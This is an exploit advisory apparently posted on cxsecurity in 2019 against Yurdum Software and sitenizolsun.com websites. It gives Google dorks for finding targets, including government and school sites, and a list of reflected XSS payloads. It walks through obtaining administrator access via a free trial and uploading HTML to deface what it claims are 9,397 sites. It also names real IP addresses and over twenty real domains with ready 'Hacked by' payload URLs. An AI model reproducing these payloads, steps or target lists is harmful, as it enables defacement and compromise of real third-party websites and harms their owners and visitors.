Yurdum Software Reflected XSS Privilege Escalation

2019.06.17
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-284

################################################################### # Exploit Title : Yurdum Software Reflected XSS Privilege Escalation # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 17/06/2019 # Vendor Homepages : yurdumyazilim.com ~ sitenizolsun.com # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : High # Vulnerability Type : CWE-79 [ Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') ] CWE-671 [ Lack of Administrator Control over Security ] CWE-522 [ Insufficiently Protected Credentials ] CWE-284 [ Improper Access Control ] CWE-285 [ Improper Authorization ] # Google Dorks : inurl:/?pnum= intext:Yer sağlayıcı: Yurdum Yazılım site:tr inurl:/?pnum= intext:Yer sağlayıcı: SitenizOlsun. site:tr intext:Yer sağlayıcı: SitenizOlsun site:tr intext:Yer sağlayıcı: Yurdum Yazılım site:tr inurl:/?pnum= site:tr inurl:/?pnum= site:gov.tr inurl:/?pnum= site:bel.tr inurl:/?pnum= site:k12.tr inurl:/?pnum= site:org.tr inurl:/?pnum= site:com.tr inurl:/?pnum= site:com inurl:/?pnum= site:net inurl:/?pnum= site:org # PacketStormSecurity : packetstormsecurity.com/files/authors/13968 # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/ # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos # Reference Link : cxsecurity.com/ascii/WLB-2019010038 ################################################################### Impact 1 Reflected XSS Cross Site Scripting (or Non-Persistent) : ********************************************************* The server reads data directly from the HTTP request and reflects it back in the HTTP response. Reflected XSS exploits occur when an attacker causes a victim to supply dangerous content to a vulnerable web application, which is then reflected back to the victim and executed by the web browser. The most common mechanism for delivering malicious content is to include it as a parameter in a URL that is posted publicly or e-mailed directly to the victim. URLs constructed in this manner constitute the core of many phishing schemes, whereby an attacker convinces a victim to visit a URL that refers to a vulnerable site. After the site reflects the attacker's content back to the victim,the content is executed by the victim's browser. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected site and allow the attacker to access sensitive browser-based information. An attacker, for example,can exploit this vulnerability to steal cookies from the attacked user in order to hijack a session and gain access to the system. Impact 2 Lack of Administrator Control over Security : *********************************************** The product uses security features in a way that prevents the product's administrator from tailoring security settings to reflect the environment in which the product is being used. This introduces resultant weaknesses or prevents it from operating at a level of security that is desired by the administrator.This weakness occurs when the application transmits or stores authentication credentials and uses an insecure method that is susceptible to unauthorized interception and/or retrieval.The software does not perform or incorrectly performs an authorization check when an actor attempts to access a resource or perform an action. An attacker could gain access to user accounts and access sensitive data used by the user accounts. ################################################################### # Reflected Cross Site Scripting XSS Exploits and Payloads : ******************************************************* 1%27<marquee><font%20color=lime%20size=32>XSS-Vulnerability-Found-By-KingSkrupellos</font></marquee> 1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E /?pnum=1&pt=1%27"></h3></tr></td></table></tr></td></table></div><marquee>XSS-Vulnerability-Found-By-KingSkrupellos /?pnum=1&pt=1%27<marquee><font%20color=lime%20size=32>KingSkrupellos</font></marquee> /?pnum=1&pt=1%27<marquee><font%20color=lime%20size=32>Hacked%20by%20KingSkrupellos</font></marquee> /?pnum=[ID-NUMBER]&pt=1%27<marquee><font%20color=lime%20size=32>Hacked%20by%20KingSkrupellos</font></marquee> /?SyfNmb=3&pt=1%27<marquee><font%20color=lime%20size=32>Hacked%20by%20KingSkrupellos</font></marquee> /?SyfNmb=[ID-NUMBER]&pt=1%27<marquee><font%20color=lime%20size=32>Hacked%20by%20KingSkrupellos</font></marquee> /?Syf=4&pt=1%27<marquee><font%20color=lime%20size=32>Hacked%20by%20KingSkrupellos</font></marquee> /?Syf=[ID-NUMBER]&pt=1%27<marquee><font%20color=lime%20size=32>Hacked%20by%20KingSkrupellos</font></marquee> /?product=1&pt=1%27<marquee><font%20color=lime%20size=32>Hacked%20by%20KingSkrupellos</font></marquee> /?product=[ID-NUMBER]&pt=1%27<marquee><font%20color=lime%20size=32>Hacked%20by%20KingSkrupellos</font></marquee> # Add Administrator / Privilege Escalation Vulnerability : *********************************************** To Take Administrator Account Register to sitenizolsun.com => Click '' Ücretsiz Dene " [ Try Free ] Then you will redirected to this address. sitenizolsun.com/website-temalari?paket=6 sitenizolsun.com/website-temalari?paket=[ID-NUMBER] Choose one packet which you want. sitenizolsun.com/website-ucretsiz-deneme-form.php?website-theme=6&paket=6 sitenizolsun.com/website-ucretsiz-deneme-form.php?website-theme=[ID-NUMBER]&paket=[ID-NUMBER] Ücretsiz Deneme Web Siteni Oluştur [ Create your Free Test Account ] Create any Random username - Create Random or your real E-Mail Address - Create Title - Random Phone Number Then Click " Sitemi Oluştur " [ Create My Website ]. Please Wait. It will create test site and administrator e-mail address and password. http://[TEST-TARGET-WEBSITE-HERE].denemepaketi.com Yönetim paneli kullanıcı adınız: YOUR ADMINISTRATOR E-MAIL ADDRESS HERE Yönetim paneli şifreniz : YOUR ADMINISTRATOR PASSWORD HERE Administrator Login Path : /login/ /login/do_login.php One Free Test Website - But you can control approximately 9397 websites at the same. You can upload files to the vulnerable system. Step 1 : Go to the " Temel Sayfalar " [ Main Pages ] => Anasayfa [ Homepage ] => Step 2 : Click to " Anasayfayı Düzenle " [ Edit Homepage ] Step 3 : Choose " Resim Ekle " [ Insert Image ] => Click to " Kaynak " [ Source ] Step 4 : /syp/dosyayukle.php?DosyaTipi=2 http://[TEST-TARGET-WEBSITE-HERE].denemepaketi.com/syp/dosyayukle.php?DosyaTipi=2 You will see a yellow and white page and it says : Step 5 : Yüklemek istediğiniz dosyaları "Gözat"a tıklayarak bilgisayarınızdan seçiniz ve "Yükle" ye tıklayınız. [ Select the files you want to upload from your computer by clicking "Browse" and click "Upload". ] Step 6 : Choose " Sayfaya sığdır (Resimler için geçerli) Max 30 MB " Step 7 : Choose your .html file from your PC and upload it. But choose HTML. Click " Yükle " [ Upload ] Button. Your File Destination : /FileUpload/epXXXXXX/File/[yourfilename.html] If you another sections such as " Add Header Image " or " Add Album " Your File Destination : /FileUpload/epXXXXXX/HeaderImages/crop/[RANDOM-NUMBERS].jpg /FileUpload/epXXXXXX/Album/epXXXXXX_[YEAR][MONTH][DAY][RANDOM-NUMBERS].jpg You can see your defaced indexes on 9397 websites at the same. Congratulations :) ################################################################### # Example Vulnerable Sites for XSS Reflected Cross Site Scripting : *********************************************************** Vulnerable IP Addresses => 51.254.33.49 => There are 37 domains hosted on this server. 81.171.1.140 => There are 8,552 domains hosted on this server. 159.69.209.93 => There are 798 domains hosted on this server. [+] gurelektrikotomasyon.com/?Syf=4&pt=1%27%3Cmarquee%3E%3CfAnt %20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E [+] giresunkesaparnavutkoy.com/?SyfNmb=2&pt=1%27%3Cmarquee%3E %3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E [+] gezintihaberleri.com/?SyfNmb=4&pt=1%27%3Cmarquee%3E%3Cfont %20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E [+] furkankirtasiye.com/?pnum=8&pt=1%27%3Cmarquee%3E%3Cfont %20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E [+] edirneselimiyeemlak.com/?Syf=13&pt=1%27%3Cmarquee%3E%3Cfont %20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E [+] giresunkesaparnavutkoy.com/?SyfNmb=2&pt=1%27%3Cmarquee%3E %3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E [+] doganisguvenligi.com/?Syf=21&pt=1%27%3Cmarquee%3E%3Cfont %20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E [+] cyberenerji.com/?pnum=9&pt=1%27%3Cmarquee%3E%3Cfont %20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E [+] siirtfistikpazari.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont %20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E [+] saglamelektronik.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont %20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E [+] radyobalkan.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont %20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E [+] pediatrikkalpcerrahisi.com/?Syf=15&blg=1&ncat_id=699210&pt= 1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked %20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E [+] ozerdeminsaatdekorasyon.com/?pnum=1&pt=1%27%3Cmarquee %3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E [+] otoarizatespit.org/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont %20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E [+] onaranelektrik.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont %20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E [+] oabtfizik.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont%20color= lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E [+] trabzonbasket.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont%20color= lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E [+] ozelegitimaraclari.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont%20color= lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E [+] reklamfolyosu.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont%20color= lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E [+] sivasaskf.org/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont%20color= lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E [+] tablopark.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont%20color= lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E [+] vansuaritmaci.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont%20color= lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E [+] noktadusakabin.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont%20color= lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E ################################################################### # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ###################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top